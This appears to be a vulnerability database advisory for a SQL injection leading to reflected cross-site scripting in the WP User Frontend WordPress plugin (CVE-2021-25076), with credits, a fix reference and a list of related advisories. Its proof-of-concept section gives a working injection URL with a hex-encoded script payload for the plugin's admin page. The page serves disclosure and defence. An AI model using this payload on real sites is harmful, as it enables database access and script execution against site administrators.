WP User Frontend < 3.5.26 – SQL Injection to Reflected Cross-Site Scripting | CVE 2021-25076 | Plugin Vulnerabilities

Description

The plugin does not validate and escape the status parameter before using it in a SQL statement in the Subscribers dashboard, leading to an SQL injection. Due to the lack of sanitisation and escaping, this could also lead to Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin.php?page=wpuf_subscribers&post_ID=1&status=%22+union+select+1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C0x3c696d6720737263206f6e6572726f723d616c6572742831293e+--+g

Affects Plugins

wp-user-frontend

Fixed in 3.5.26

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2648715

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

6d3eeba6-5560-4380-a6e9-f008a9112ac6

Timeline

Publicly Published

2021-12-27 (about 4 years ago)

Added

2021-12-27 (about 3 years ago)

Last Updated

2022-04-13 (about 3 years ago)

Other

Published

Title

Published

2024-06-11

Title

Elementor Addon Elements < 1.13.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via Twitter Widget

Published

2025-09-09

Title

Welcart e-Commerce < 2.11.21 - Authenticated (Editor+) Stored Cross-Site Scripting

Published

2024-07-11

Title

Download Button for Elementor <= 1.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-04-16

Title

Import Content in WordPress & WooCommerce with Excel < 4.3 - Reflected Cross-Site Scripting

Published

2023-11-29

Title

Social Share Buttons & Analytics Plugin < 4.4 - Admin+ Stored XSS